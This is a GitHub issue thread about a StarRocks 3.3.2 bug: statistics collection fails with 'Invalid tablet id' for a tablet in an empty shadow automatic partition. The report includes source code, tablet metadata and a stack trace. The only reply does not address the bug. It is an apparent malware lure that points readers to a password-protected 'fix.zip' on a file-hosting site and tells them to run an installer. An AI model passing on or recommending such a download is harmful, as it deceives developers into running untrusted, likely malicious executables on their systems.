### ISSUE TITLE
invalid tablet id  

### ISSUE THREAD

**Issue by dickson-bit** [StarRocks/starrocks#50262]
```
2024-08-23 18:34:36.817+08:00 WARN (AutoStatistic|27) [StatisticExecutor.collectStatistics():287] Collect statistics error
 com.starrocks.common.DdlException: Invalid tablet id: '2474027'
2024-08-26 15:55:17.842+08:00 WARN (AutoStatistic|27) [StatisticsCollectJob.collectStatisticSync():154] Statistics collect fail | Error Message [Invalid tablet id: '2474027'] | 890737dc-6380-11ef-97fb-02425594f25c | SQL [INSERT INTO _statistics_.table_statistic_v1 WITH base_cte_table as ( ........ 
```

### Steps to reproduce the behavior (Required)
file：https://github.com/StarRocks/starrocks/blob/3.3.2/fe/fe-core/src/main/java/com/starrocks/planner/OlapScanNode.java
`
    private Map<Long, List<Long>> mapTabletsToPartitions() {  line:1309
        Map<Long, Long> tabletToPartitionMap = Maps.newHashMap();
        Map<Long, List<Long>> partitionToTabletMap = Maps.newHashMap();

        //生成tabletToPartitionMap 的值, 来自于 selectedPartitionIds 变量。
        没有$shadow_automatic_partition里的值
        for (Long partitionId : selectedPartitionIds) {
            Partition partition = olapTable.getPartition(partitionId);
            for (PhysicalPartition physicalPartition : partition.getSubPartitions()) {
                MaterializedIndex materializedIndex = physicalPartition.getIndex(selectedIndexId);
                for (long tabletId : materializedIndex.getTabletIdsInOrder()) {
                    tabletToPartitionMap.put(tabletId, physicalPartition.getId());
                }
                partitionToTabletMap.put(physicalPartition.getId(), Lists.newArrayList());
            }
        }
        // 遍历所有的 scanTabletIds, 
        for (Long tabletId : scanTabletIds) {
            // for query: select count(1) from t tablet(tablet_id0, tablet_id1,...), the user-provided tablet_id
            // maybe invalid.  检查tabletId 是否合法， tabletid 被收入空partition的，shadow
            Preconditions.checkState(tabletToPartitionMap.containsKey(tabletId),
                    "Invalid tablet id: '" + tabletId + "'");
            long partitionId = tabletToPartitionMap.get(tabletId);
            partitionToTabletMap.computeIfAbsent(partitionId, k -> Lists.newArrayList()).add(tabletId);
        }

        LOG.debug("mapTabletsToPartitions. tabletToPartitionMap: {}, partitionToTabletMap: {}",
                tabletToPartitionMap, partitionToTabletMap);
        return partitionToTabletMap;
    }

`

computePartitionInfo 函数 计算 
```
如果 partition 为空， 则
    for (Partition partition : olapTable.getPartitions()) {
        if (!partition.hasData()) {
            continue;
        }
        selectedPartitionIds.add(partition.getId());
    }

```
### tablet id  2474027   is in   **scanTabletIds**  and  not in  **tabletToPartitionMap**,  这两个变量都来自selectedPartitionIds，  selectedPartitionIds 的生成过程，代码屏蔽了 no data 的partition， 但是好像没有起作用

tablet id  2474027   partition name is  $shadow_automatic_partition, which partition's data size is zero.

### StarRocks version (Required)
 - 3.3.2

show tablet 2474027

```
Name         |Value                                                              |
-------------+-------------------------------------------------------------------+
DbName       |es                                                                 |
TableName    |************                                             |
PartitionName|$shadow_automatic_partition                                        |
IndexName    |********                                             |
DbId         |177220                                                             |
TableId      |2300951                                                            |
PartitionId  |2303654                                                            |
IndexId      |2474026                                                            |
IsSync       |true                                                               |
DetailCmd    |SHOW PROC '/dbs/177220/2300951/partitions/2303654/2474026/2474027';|
```

fe.warn.log
`
java.lang.IllegalStateException: Invalid tablet id: '2474027'
        at com.google.common.base.Preconditions.checkState(Preconditions.java:512)
        at com.starrocks.planner.OlapScanNode.mapTabletsToPartitions(OlapScanNode.java:1326)
        at com.starrocks.planner.OlapScanNode.updateScanInfo(OlapScanNode.java:1041)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visitPhysicalOlapScan(PlanFragmentBuilder.java:795)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visitPhysicalOlapScan(PlanFragmentBuilder.java:408)
        at com.starrocks.sql.optimizer.operator.physical.PhysicalOlapScanOperator.accept(PhysicalOlapScanOperator.java:201)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visit(PlanFragmentBuilder.java:456)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visitPhysicalDistribution(PlanFragmentBuilder.java:2286)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visitPhysicalDistribution(PlanFragmentBuilder.java:408)
        at com.starrocks.sql.optimizer.operator.physical.PhysicalDistributionOperator.accept(PhysicalDistributionOperator.java:75)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visit(PlanFragmentBuilder.java:456)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visitPhysicalLimit(PlanFragmentBuilder.java:3185)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visitPhysicalLimit(PlanFragmentBuilder.java:408)
        at com.starrocks.sql.optimizer.operator.physical.PhysicalLimitOperator.accept(PhysicalLimitOperator.java:58)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visit(PlanFragmentBuilder.java:456)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.buildSetOperation(PlanFragmentBuilder.java:3015)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visitPhysicalUnion(PlanFragmentBuilder.java:3071)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visitPhysicalUnion(PlanFragmentBuilder.java:408)
        at com.starrocks.sql.optimizer.operator.physical.PhysicalUnionOperator.accept(PhysicalUnionOperator.java:69)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visit(PlanFragmentBuilder.java:456)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visitPhysicalCTEProduce(PlanFragmentBuilder.java:3279)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visitPhysicalCTEProduce(PlanFragmentBuilder.java:408)
        at com.starrocks.sql.optimizer.operator.physical.PhysicalCTEProduceOperator.accept(PhysicalCTEProduceOperator.java:46)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visit(PlanFragmentBuilder.java:456)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visitPhysicalCTEAnchor(PlanFragmentBuilder.java:3296)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visitPhysicalCTEAnchor(PlanFragmentBuilder.java:408)
        at com.starrocks.sql.optimizer.operator.physical.PhysicalCTEAnchorOperator.accept(PhysicalCTEAnchorOperator.java:54)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.visit(PlanFragmentBuilder.java:456)
        at com.starrocks.sql.plan.PlanFragmentBuilder$PhysicalPlanTranslator.translate(PlanFragmentBuilder.java:421)
        at com.starrocks.sql.plan.PlanFragmentBuilder.createPhysicalPlan(PlanFragmentBuilder.java:240)
        at com.starrocks.sql.InsertPlanner.buildExecPlan(InsertPlanner.java:527)
        at com.starrocks.sql.InsertPlanner.plan(InsertPlanner.java:315)
        at com.starrocks.sql.StatementPlanner.planInsertStmt(StatementPlanner.java:199)
        at com.starrocks.sql.StatementPlanner.plan(StatementPlanner.java:140)
        at com.starrocks.sql.StatementPlanner.plan(StatementPlanner.java:93)
        at com.starrocks.qe.StmtExecutor.execute(StmtExecutor.java:534)
        at com.starrocks.statistic.StatisticsCollectJob.collectStatisticSync(StatisticsCollectJob.java:151)
        at com.starrocks.statistic.SampleStatisticsCollectJob.collect(SampleStatisticsCollectJob.java:79)
        at com.starrocks.statistic.StatisticExecutor.collectStatistics(StatisticExecutor.java:285)
        at com.starrocks.statistic.StatisticAutoCollector.runAfterCatalogReady(StatisticAutoCollector.java:86)
        at com.starrocks.common.util.FrontendDaemon.runOneCycle(FrontendDaemon.java:72)
        at com.starrocks.common.util.Daemon.run(Daemon.java:107)
`

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
